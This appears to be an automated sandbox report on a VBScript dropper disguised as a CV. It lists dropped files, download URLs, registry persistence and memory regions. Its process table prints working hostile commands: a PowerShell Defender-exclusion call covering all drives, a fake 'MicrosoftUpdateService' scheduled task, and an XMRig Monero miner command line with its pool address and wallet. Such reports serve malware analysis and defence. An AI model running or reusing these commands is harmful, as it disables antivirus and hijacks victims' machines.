Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
curriculum_vitae-copie.vbs
|
assembler source, ASCII text, with very long lines (52487)
|
initial sample
|
 |
|
|
C:\Users\Public\7g.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\Update.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\WinRing0x64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\go.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\mozilla.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\mservice.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\mservice.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\ps.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\gmail.7z
|
7-zip archive data, version 0.4
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\WindowsUpdate\sarmat.vbs
|
assembler source, ASCII text
|
dropped
|
||
|
C:\Users\Public\log.dat
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\gmail[1].7z
|
7-zip archive data, version 0.4
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fhh2tk2.a5a.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwlcfquj.2yb.psm1
|
very short file (no magic)
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
|
|
|
|
C:\Users\Public\7g.exe
|
C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
|
|
|
|
C:\Windows\System32\wscript.exe
|
wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
|
|
|
|
C:\Users\Public\WindowsUpdate\mservice.exe
|
"C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu
-p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 9 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.7-zip.org/w
|
unknown
|
||
|
https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsee
|
unknown
|
||
|
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falseA
|
unknown
|
||
|
https://xmrig.com/wizard%s
|
unknown
|
||
|
https://new-sentry.gitlab.net
|
unknown
|
||
|
https://snowplow.trx.gitlab.net
|
unknown
|
||
|
https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;
|
unknown
|
||
|
https://xmrig.com/wizard
|
unknown
|
||
|
https://gitlab.com/
|
unknown
|
||
|
https://www.7-zip.org/O
|
unknown
|
||
|
https://snowplow.tgitlab.c%
|
unknown
|
||
|
https://gitlab.com
|
unknown
|
||
|
https://gitlab.com/cwIf
|
unknown
|
||
|
https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false
|
unknown
|
||
|
https://www.7-zip.org/a/7zr.exel
|
unknown
|
||
|
https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseMsg
|
unknown
|
||
|
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=false
|
172.65.251.78
|
||
|
https://gitlab.com/-/sandbox/
|
unknown
|
||
|
https://gitlab.com/admin/
|
unknown
|
||
|
https://gitlab.com/assets/
|
unknown
|
||
|
https://customers.gitlab.com
|
unknown
|
||
|
https://gitlab.com/-/speedscope/index.html
|
unknown
|
||
|
https://www.google.com/recaptcha/
|
unknown
|
||
|
https://www.7-zip.org/a/7zr.exe
|
49.12.202.237
|
||
|
https://xmrig.com/docs/algorithms
|
unknown
|
||
|
https://sourcegraph.com
|
unknown
|
||
|
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsex
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://snowplow.tgitlab.c%%.
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
https://sentry.gitlab.net
|
unknown
|
||
|
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsem
|
unknown
|
||
|
https://www.recaptcha.net/
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.7-zip.org
|
49.12.202.237
|
||
|
gitlab.com
|
172.65.251.78
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
141.94.96.144
|
unknown
|
Germany
|
|
|
|
172.65.251.78
|
gitlab.com
|
United States
|
||
|
49.12.202.237
|
www.7-zip.org
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
Microsoft Media Service
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3A20000
|
direct allocation
|
page read and write
|
|
|
|
3580000
|
direct allocation
|
page read and write
|
|
|
|
7FF7A0D92000
|
unkown
|
page readonly
|
|
|
|
2216310C000
|
heap
|
page read and write
|
||
|
1DE9C6D0000
|
unkown
|
page readonly
|
||
|
59FF7FE000
|
stack
|
page read and write
|
||
|
765EBFF000
|
stack
|
page read and write
|
||
|
1959AD28000
|
heap
|
page read and write
|
||
|
22163188000
|
heap
|
page read and write
|
||
|
7FF5693D5000
|
unkown
|
page readonly
|
||
|
16591D30000
|
heap
|
page read and write
|
||
|
765E7FF000
|
stack
|
page read and write
|
||
|
22162E54000
|
heap
|
page read and write
|
||
|
7FF569367000
|
unkown
|
page readonly
|
||
|
22E67CE0000
|
heap
|
page read and write
|
||
|
1959AD28000
|
heap
|
page read and write
|
||
|
FF622FB000
|
stack
|
page read and write
|
||
|
22E67B18000
|
heap
|
page read and write
|
||
|
221630E8000
|
heap
|
page read and write
|
||
|
22165D70000
|
heap
|
page read and write
|
||
|
DB954FF000
|
stack
|
page read and write
|
||
|
2D5AC4D0000
|
heap
|
page read and write
|
||
|
2D5AC9DA000
|
heap
|
page read and write
|
||
|
149E000
|
heap
|
page read and write
|
||
|
1AEA6CB2000
|
heap
|
page read and write
|
||
|
27914FE000
|
stack
|
page read and write
|
||
|
7FF56944B000
|
unkown
|
page readonly
|
||
|
2D5ACA05000
|
heap
|
page read and write
|
||
|
22162E60000
|
heap
|
page read and write
|
||
|
22161035000
|
heap
|
page read and write
|
||
|
7FF56912B000
|
unkown
|
page readonly
|
||
|
2D5AC9E7000
|
heap
|
page read and write
|
||
|
1AEA6BF0000
|
heap
|
page read and write
|
||
|
22E67AD3000
|
heap
|
page read and write
|
||
|
149E000
|
heap
|
page read and write
|
||
|
2E14AFF0000
|
heap
|
page read and write
|
||
|
7FF7A1178000
|
unkown
|
page readonly
|
||
|
22163560000
|
heap
|
page read and write
|
||
|
59FF6F9000
|
stack
|
page read and write
|
||
|
16591DAE000
|
heap
|
page read and write
|
||
|
2216307D000
|
heap
|
page read and write
|
||
|
1DE9C310000
|
heap
|
page read and write
|
||
|
2216311D000
|
heap
|
page read and write
|
||
|
16591DAB000
|
heap
|
page read and write
|
||
|
2D5AAB36000
|
heap
|
page read and write
|
||
|
1959AD4E000
|
heap
|
page read and write
|
||
|
1E320C05000
|
heap
|
page read and write
|
||
|
22E67AA0000
|
heap
|
page read and write
|
||
|
2D5AC853000
|
heap
|
page read and write
|
||
|
22165460000
|
heap
|
page read and write
|
||
|
22162DB1000
|
heap
|
page read and write
|
||
|
2216311D000
|
heap
|
page read and write
|
||
|
1959AD13000
|
heap
|
page read and write
|
||
|
22E67B20000
|
heap
|
page read and write
|
||
|
2E14D1D0000
|
unkown
|
page readonly
|
||
|
22162F60000
|
heap
|
page read and write
|
||
|
FF61EFE000
|
stack
|
page read and write
|
||
|
221630BD000
|
heap
|
page read and write
|
||
|
2216319E000
|
heap
|
page read and write
|
||
|
2E14B100000
|
unkown
|
page read and write
|
||
|
1DBC74D7000
|
heap
|
page read and write
|
||
|
22162F97000
|
heap
|
page read and write
|
||
|
765EEFF000
|
stack
|
page read and write
|
||
|
7FF56941E000
|
unkown
|
page readonly
|
||
|
3A902FE000
|
stack
|
page read and write
|
||
|
22E67B18000
|
heap
|
page read and write
|
||
|
22163163000
|
heap
|
page read and write
|
||
|
22160F96000
|
heap
|
page read and write
|
||
|
1959AD01000
|
heap
|
page read and write
|
||
|
221630A5000
|
heap
|
page read and write
|
||
|
1AEA6E4B000
|
heap
|
page read and write
|
||
|
2D5ACA19000
|
heap
|
page read and write
|
||
|
1FFE095E000
|
heap
|
page read and write
|
||
|
22E67AD3000
|
heap
|
page read and write
|
||
|
2D5AC951000
|
heap
|
page read and write
|
||
|
7FF569432000
|
unkown
|
page readonly
|
||
|
1FFE091E000
|
heap
|
page read and write
|
||
|
2D5AAA94000
|
heap
|
page read and write
|
||
|
27913FE000
|
stack
|
page read and write
|
||
|
1DBC74EB000
|
heap
|
page read and write
|
||
|
22163161000
|
heap
|
page read and write
|
||
|
1DE9C413000
|
unkown
|
page read and write
|
||
|
2D5AC869000
|
heap
|
page read and write
|
||
|
22E679F0000
|
heap
|
page read and write
|
||
|
1DE9C413000
|
unkown
|
page read and write
|
||
|
22165ABB000
|
heap
|
page read and write
|
||
|
58DD4FE000
|
stack
|
page read and write
|
||
|
22E67B20000
|
heap
|
page read and write
|
||
|
2216318B000
|
heap
|
page read and write
|
||
|
22160F70000
|
heap
|
page read and write
|
||
|
22163078000
|
heap
|
page read and write
|
||
|
22E67B6B000
|
heap
|
page read and write
|
||
|
1959AD00000
|
heap
|
page read and write
|
||
|
22165971000
|
heap
|
page read and write
|
||
|
7FF569150000
|
unkown
|
page readonly
|
||
|
2D5AAB42000
|
heap
|
page read and write
|
||
|
7FF7A1154000
|
unkown
|
page readonly
|
||
|
2D5AC950000
|
heap
|
page read and write
|
||
|
1FFE0961000
|
heap
|
page read and write
|
||
|
1FFE0944000
|
heap
|
page read and write
|
||
|
2E14CDA0000
|
unkown
|
page read and write
|
||
|
221633E0000
|
remote allocation
|
page read and write
|
||
|
1959CB10000
|
heap
|
page read and write
|
||
|
2E14B1C0000
|
heap
|
page read and write
|
||
|
7FF56912B000
|
unkown
|
page readonly
|
||
|
22163565000
|
heap
|
page read and write
|
||
|
1DE9CE02000
|
unkown
|
page read and write
|
||
|
1FFE0910000
|
heap
|
page read and write
|
||
|
1959CB13000
|
heap
|
page read and write
|
||
|
1480000
|
direct allocation
|
page read and write
|
||
|
7FF569150000
|
unkown
|
page readonly
|
||
|
22160EB0000
|
heap
|
page read and write
|
||
|
2D5AAA00000
|
heap
|
page read and write
|
||
|
1AEA896B000
|
heap
|
page read and write
|
||
|
3B1000
|
unkown
|
page execute read
|
||
|
22162E54000
|
heap
|
page read and write
|
||
|
58DC4FE000
|
stack
|
page read and write
|
||
|
22E67A10000
|
heap
|
page read and write
|
||
|
1564000
|
heap
|
page read and write
|
||
|
2D5ACA23000
|
heap
|
page read and write
|
||
|
22162DA3000
|
heap
|
page read and write
|
||
|
2D5AAB3A000
|
heap
|
page read and write
|
||
|
185478EC000
|
heap
|
page read and write
|
||
|
1959AD4E000
|
heap
|
page read and write
|
||
|
1E320AB1000
|
heap
|
page read and write
|
||
|
2D5ACB32000
|
heap
|
page read and write
|
||
|
1959AD12000
|
heap
|
page read and write
|
||
|
1E320AB1000
|
heap
|
page read and write
|
||
|
E10AEFF000
|
stack
|
page read and write
|
||
|
1AEA6C99000
|
heap
|
page read and write
|
||
|
1959AD28000
|
heap
|
page read and write
|
||
|
1AEA6CBE000
|
heap
|
page read and write
|
||
|
1959AC80000
|
heap
|
page read and write
|
||
|
1959AD04000
|
heap
|
page read and write
|
||
|
1AEA6C96000
|
heap
|
page read and write
|
||
|
1DE9CA60000
|
unkown
|
page readonly
|
||
|
FF61FFE000
|
stack
|
page read and write
|
||
|
1959ACCE000
|
heap
|
page read and write
|
||
|
185464EC000
|
heap
|
page read and write
|
||
|
22E67B14000
|
heap
|
page read and write
|
||
|
1959ACFE000
|
heap
|
page read and write
|
||
|
18541E7B000
|
heap
|
page read and write
|
||
|
22163410000
|
heap
|
page read and write
|
||
|
16591F85000
|
heap
|
page read and write
|
||
|
2D5AADD0000
|
heap
|
page read and write
|
||
|
1E320AB1000
|
heap
|
page read and write
|
||
|
22163185000
|
heap
|
page read and write
|
||
|
221630C3000
|
heap
|
page read and write
|
||
|
1AEA6E40000
|
heap
|
page read and write
|
||
|
2D5ACB32000
|
heap
|
page read and write
|
||
|
18540490000
|
heap
|
page read and write
|
||
|
22160F79000
|
heap
|
page read and write
|
||
|
1AEA6E4A000
|
heap
|
page read and write
|
||
|
22E67AC9000
|
heap
|
page read and write
|
||
|
765EDFE000
|
stack
|
page read and write
|
||
|
22E67CE5000
|
heap
|
page read and write
|
||
|
7FF7A0EAA000
|
unkown
|
page write copy
|
||
|
2D5AAA60000
|
heap
|
page read and write
|
||
|
22165B81000
|
heap
|
page read and write
|
||
|
2D5AC859000
|
heap
|
page read and write
|
||
|
2D5AC875000
|
heap
|
page read and write
|
||
|
185405FE000
|
heap
|
page read and write
|
||
|
1AEA6CD2000
|
heap
|
page read and write
|
||
|
22162E6C000
|
heap
|
page read and write
|
||
|
1DE9C3A0000
|
unkown
|
page read and write
|
||
|
22162F77000
|
heap
|
page read and write
|
||
|
1AEA6C9B000
|
heap
|
page read and write
|
||
|
22E67AC9000
|
heap
|
page read and write
|
||
|
2D5AAB3D000
|
heap
|
page read and write
|
||
|
7FF5693E6000
|
unkown
|
page readonly
|
||
|
22E67B12000
|
heap
|
page read and write
|
||
|
22E67B3E000
|
heap
|
page read and write
|
||
|
22160FAB000
|
heap
|
page read and write
|
||
|
7FF5693D5000
|
unkown
|
page readonly
|
||
|
18541E62000
|
heap
|
page read and write
|
||
|
DB94BFE000
|
stack
|
page read and write
|
||
|
149E000
|
heap
|
page read and write
|
||
|
1DBC74B3000
|
heap
|
page read and write
|
||
|
22162E69000
|
heap
|
page read and write
|
||
|
7FF56941B000
|
unkown
|
page readonly
|
||
|
1AEA8967000
|
heap
|
page read and write
|
||
|
22163161000
|
heap
|
page read and write
|
||
|
22162DBC000
|
heap
|
page read and write
|
||
|
140E000
|
stack
|
page read and write
|
||
|
22163195000
|
heap
|
page read and write
|
||
|
E8FB97C000
|
unkown
|
page read and write
|
||
|
2D5ACA18000
|
heap
|
page read and write
|
||
|
18541E22000
|
heap
|
page read and write
|
||
|
7FF56944B000
|
unkown
|
page readonly
|
||
|
1959ACF5000
|
heap
|
page read and write
|
||
|
1DBC748B000
|
heap
|
page read and write
|
||
|
22165A78000
|
heap
|
page read and write
|
||
|
FF61CFF000
|
stack
|
page read and write
|
||
|
1959ACAA000
|
heap
|
page read and write
|
||
|
22165BA5000
|
heap
|
page read and write
|
||
|
1AEA6CC7000
|
heap
|
page read and write
|
||
|
7FF7A0A50000
|
unkown
|
page readonly
|
||
|
3400000
|
heap
|
page read and write
|
||
|
1DE9C310000
|
heap
|
page read and write
|
||
|
22E67B2F000
|
heap
|
page read and write
|
||
|
2D5AC871000
|
heap
|
page read and write
|
||
|
22E67AEA000
|
heap
|
page read and write
|
||
|
1E320A89000
|
heap
|
page read and write
|
||
|
66299FF000
|
stack
|
page read and write
|
||
|
1DBC7700000
|
heap
|
page read and write
|
||
|
22162E69000
|
heap
|
page read and write
|
||
|
2D5AC9E3000
|
heap
|
page read and write
|
||
|
1DBC748B000
|
heap
|
page read and write
|
||
|
22162E60000
|
heap
|
page read and write
|
||
|
1959ACF5000
|
heap
|
page read and write
|
||
|
2E14B120000
|
unkown
|
page read and write
|
||
|
2D5ACA61000
|
heap
|
page read and write
|
||
|
2D5ACA24000
|
heap
|
page read and write
|
||
|
1959ACFD000
|
heap
|
page read and write
|
||
|
FF61DFF000
|
stack
|
page read and write
|
||
|
2D5AAA8A000
|
heap
|
page read and write
|
||
|
185432EC000
|
heap
|
page read and write
|
||
|
22162DC1000
|
heap
|
page read and write
|
||
|
221611F0000
|
heap
|
page read and write
|
||
|
7FF56942B000
|
unkown
|
page readonly
|
||
|
2E14B180000
|
unkown
|
page read and write
|
||
|
2E14D0D4000
|
unkown
|
page read and write
|
||
|
22E67B18000
|
heap
|
page read and write
|
||
|
7FF569432000
|
unkown
|
page readonly
|
||
|
18541E32000
|
heap
|
page read and write
|
||
|
22165A37000
|
heap
|
page read and write
|
||
|
1E320AAD000
|
heap
|
page read and write
|
||
|
2D5AAB34000
|
heap
|
page read and write
|
||
|
22E67B3E000
|
heap
|
page read and write
|
||
|
43A000
|
unkown
|
page read and write
|
||
|
22E67AEA000
|
heap
|
page read and write
|
||
|
1E320AAD000
|
heap
|
page read and write
|
||
|
2D5ACA60000
|
heap
|
page read and write
|
||
|
2D5ACB40000
|
heap
|
page read and write
|
||
|
1854050B000
|
heap
|
page read and write
|
||
|
2E14B2BD000
|
unkown
|
page read and write
|
||
|
22165974000
|
heap
|
page read and write
|
||
|
221630C5000
|
heap
|
page read and write
|
||
|
1AEA6CE1000
|
heap
|
page read and write
|
||
|
1AEA6C82000
|
heap
|
page read and write
|
||
|
1DBC74CC000
|
heap
|
page read and write
|
||
|
E8FBA7C000
|
unkown
|
page read and write
|
||
|
16591D97000
|
heap
|
page read and write
|
||
|
DB94FFE000
|
stack
|
page read and write
|
||
|
FF619FE000
|
stack
|
page read and write
|
||
|
1959ACFE000
|
heap
|
page read and write
|
||
|
22162F77000
|
heap
|
page read and write
|
||
|
3A8FFFF000
|
stack
|
page read and write
|
||
|
2216311A000
|
heap
|
page read and write
|
||
|
3B1000
|
unkown
|
page execute read
|
||
|
149E000
|
heap
|
page read and write
|
||
|
22162DB9000
|
heap
|
page read and write
|
||
|
7FF5694AE000
|
unkown
|
page readonly
|
||
|
22165870000
|
heap
|
page read and write
|
||
|
22162E60000
|
heap
|
page read and write
|
||
|
18541E12000
|
heap
|
page read and write
|
||
|
2D5AAB28000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
58DC9FD000
|
stack
|
page read and write
|
||
|
1E320A72000
|
heap
|
page read and write
|
||
|
2D5AC875000
|
heap
|
page read and write
|
||
|
1FFE0936000
|
heap
|
page read and write
|
||
|
16591DB0000
|
heap
|
page read and write
|
||
|
1959AD03000
|
heap
|
page read and write
|
||
|
1959ACEE000
|
heap
|
page read and write
|
||
|
1DE9C43B000
|
unkown
|
page read and write
|
||
|
1AEA6BD0000
|
heap
|
page read and write
|
||
|
1DBC74CA000
|
heap
|
page read and write
|
||
|
16591DA1000
|
heap
|
page read and write
|
||
|
16591DA5000
|
heap
|
page read and write
|
||
|
221659BB000
|
heap
|
page read and write
|
||
|
1959ACED000
|
heap
|
page read and write
|
||
|
184F000
|
stack
|
page read and write
|
||
|
3300000
|
direct allocation
|
page read and write
|
||
|
1DE9CE02000
|
unkown
|
page read and write
|
||
|
22E678B0000
|
heap
|
page read and write
|
||
|
2D5AC9F0000
|
heap
|
page read and write
|
||
|
2D5ACA23000
|
heap
|
page read and write
|
||
|
2D5AC904000
|
heap
|
page read and write
|
||
|
3241000
|
heap
|
page read and write
|
||
|
22161049000
|
heap
|
page read and write
|
||
|
2D5AC904000
|
heap
|
page read and write
|
||
|
1DBC73A0000
|
heap
|
page read and write
|
||
|
58DC9FB000
|
stack
|
page read and write
|
||
|
2216307F000
|
heap
|
page read and write
|
||
|
58DC5FF000
|
stack
|
page read and write
|
||
|
1DBC74C7000
|
heap
|
page read and write
|
||
|
22162F77000
|
heap
|
page read and write
|
||
|
2D5AAB43000
|
heap
|
page read and write
|
||
|
429000
|
unkown
|
page readonly
|
||
|
1DBC7492000
|
heap
|
page read and write
|
||
|
22165ABC000
|
heap
|
page read and write
|
||
|
2216319E000
|
heap
|
page read and write
|
||
|
58DCAFE000
|
stack
|
page read and write
|
||
|
16591DAC000
|
heap
|
page read and write
|
||
|
22E67B25000
|
heap
|
page read and write
|
||
|
185428EC000
|
heap
|
page read and write
|
||
|
1480000
|
direct allocation
|
page read and write
|
||
|
59FFBFF000
|
stack
|
page read and write
|
||
|
E10AFFD000
|
stack
|
page read and write
|
||
|
22E67B0C000
|
heap
|
page read and write
|
||
|
1E320A7E000
|
heap
|
page read and write
|
||
|
185446EC000
|
heap
|
page read and write
|
||
|
2D5ACB34000
|
heap
|
page read and write
|
||
|
59FF8FE000
|
stack
|
page read and write
|
||
|
2E14D2B0000
|
unkown
|
page readonly
|
||
|
221611C0000
|
heap
|
page read and write
|
||
|
22E67B1C000
|
heap
|
page read and write
|
||
|
2D9CAF9000
|
stack
|
page read and write
|
||
|
2D5AAA88000
|
heap
|
page read and write
|
||
|
1DE9C370000
|
heap
|
page read and write
|
||
|
66297FF000
|
stack
|
page read and write
|
||
|
18546EEC000
|
heap
|
page read and write
|
||
|
2D5ACA05000
|
heap
|
page read and write
|
||
|
27915FE000
|
stack
|
page read and write
|
||
|
27912F8000
|
stack
|
page read and write
|
||
|
3A8FCFE000
|
stack
|
page read and write
|
||
|
2D9CFFE000
|
stack
|
page read and write
|
||
|
1470000
|
heap
|
page read and write
|
||
|
1E320A9A000
|
heap
|
page read and write
|
||
|
2D5AAA93000
|
heap
|
page read and write
|
||
|
149E000
|
heap
|
page read and write
|
||
|
2D5ACB40000
|
heap
|
page read and write
|
||
|
22162FA0000
|
heap
|
page read and write
|
||
|
16591DAC000
|
heap
|
page read and write
|
||
|
221633E0000
|
remote allocation
|
page read and write
|
||
|
E8FB709000
|
unkown
|
page read and write
|
||
|
1DE9CA60000
|
unkown
|
page readonly
|
||
|
765EAFF000
|
stack
|
page read and write
|
||
|
22165A16000
|
heap
|
page read and write
|
||
|
22162F98000
|
heap
|
page read and write
|
||
|
1AEA6CD2000
|
heap
|
page read and write
|
||
|
22165A16000
|
heap
|
page read and write
|
||
|
1DE9C380000
|
unkown
|
page readonly
|
||
|
3B0000
|
unkown
|
page readonly
|
||
|
1959ACB4000
|
heap
|
page read and write
|
||
|
1AEA6E4A000
|
heap
|
page read and write
|
||
|
22162F3E000
|
heap
|
page read and write
|
||
|
DB94AF5000
|
stack
|
page read and write
|
||
|
1AEA6C96000
|
heap
|
page read and write
|
||
|
1E320AAC000
|
heap
|
page read and write
|
||
|
7FF56941E000
|
unkown
|
page readonly
|
||
|
1E320A79000
|
heap
|
page read and write
|
||
|
2D5AC904000
|
heap
|
page read and write
|
||
|
18541E42000
|
heap
|
page read and write
|
||
|
1959AD03000
|
heap
|
page read and write
|
||
|
22162F98000
|
heap
|
page read and write
|
||
|
1E320A10000
|
heap
|
page read and write
|
||
|
16591DA9000
|
heap
|
page read and write
|
||
|
16591DAE000
|
heap
|
page read and write
|
||
|
7FF5693DA000
|
unkown
|
page readonly
|
||
|
7FF5694CD000
|
unkown
|
page readonly
|
||
|
1959ABF0000
|
heap
|
page read and write
|
||
|
1AEA6CE0000
|
heap
|
page read and write
|
||
|
221636F0000
|
heap
|
page read and write
|
||
|
2216310C000
|
heap
|
page read and write
|
||
|
2E14B190000
|
unkown
|
page readonly
|
||
|
848357F000
|
stack
|
page read and write
|
||
|
221630BD000
|
heap
|
page read and write
|
||
|
22162E57000
|
heap
|
page read and write
|
||
|
66291D9000
|
stack
|
page read and write
|
||
|
1FFE094A000
|
heap
|
page read and write
|
||
|
1FFE0964000
|
heap
|
page read and write
|
||
|
18540599000
|
heap
|
page read and write
|
||
|
22162EA0000
|
heap
|
page read and write
|
||
|
185404B0000
|
direct allocation
|
page execute read
|
||
|
22161048000
|
heap
|
page read and write
|
||
|
22163620000
|
heap
|
page read and write
|
||
|
1959ACFA000
|
heap
|
page read and write
|
||
|
58DC8FE000
|
stack
|
page read and write
|
||
|
2D9CEFF000
|
stack
|
page read and write
|
||
|
1959AC88000
|
heap
|
page read and write
|
||
|
149A000
|
heap
|
page read and write
|
||
|
1DE9C400000
|
unkown
|
page read and write
|
||
|
1959AB60000
|
heap
|
page read and write
|
||
|
2FF4000
|
heap
|
page read and write
|
||
|
22162F53000
|
heap
|
page read and write
|
||
|
2D5AAA8A000
|
heap
|
page read and write
|
||
|
22E67B1B000
|
heap
|
page read and write
|
||
|
E8FB705000
|
unkown
|
page read and write
|
||
|
18540578000
|
heap
|
page read and write
|
||
|
1AEA6CCC000
|
heap
|
page read and write
|
||
|
2D5ACA23000
|
heap
|
page read and write
|
||
|
16591DB6000
|
heap
|
page read and write
|
||
|
2D5ACA05000
|
heap
|
page read and write
|
||
|
E10ADFF000
|
stack
|
page read and write
|
||
|
765E6FF000
|
stack
|
page read and write
|
||
|
22165B3F000
|
heap
|
page read and write
|
||
|
1959ACFE000
|
heap
|
page read and write
|
||
|
1AEA6CCD000
|
heap
|
page read and write
|
||
|
FF618F9000
|
stack
|
page read and write
|
||
|
1DE9C3A0000
|
unkown
|
page read and write
|
||
|
1E320A9B000
|
heap
|
page read and write
|
||
|
221630BD000
|
heap
|
page read and write
|
||
|
58DC2FA000
|
stack
|
page read and write
|
||
|
22162E5B000
|
heap
|
page read and write
|
||
|
1959ACB4000
|
heap
|
page read and write
|
||
|
1959C7C0000
|
heap
|
page read and write
|
||
|
7FF569418000
|
unkown
|
page readonly
|
||
|
3A904FB000
|
stack
|
page read and write
|
||
|
E10ABFE000
|
stack
|
page read and write
|
||
|
1AEA6C9A000
|
heap
|
page read and write
|
||
|
1FFE0960000
|
heap
|
page read and write
|
||
|
7FF5693F5000
|
unkown
|
page readonly
|
||
|
22162E54000
|
heap
|
page read and write
|
||
|
221630E9000
|
heap
|
page read and write
|
||
|
22164AB0000
|
trusted library allocation
|
page read and write
|
||
|
16591DAE000
|
heap
|
page read and write
|
||
|
7FF569448000
|
unkown
|
page readonly
|
||
|
7FF569415000
|
unkown
|
page readonly
|
||
|
1E320A6E000
|
heap
|
page read and write
|
||
|
E8FB87F000
|
stack
|
page read and write
|
||
|
1FFE0963000
|
heap
|
page read and write
|
||
|
2216104A000
|
heap
|
page read and write
|
||
|
16591DB6000
|
heap
|
page read and write
|
||
|
22161035000
|
heap
|
page read and write
|
||
|
1DE9C444000
|
unkown
|
page read and write
|
||
|
1DE9C441000
|
unkown
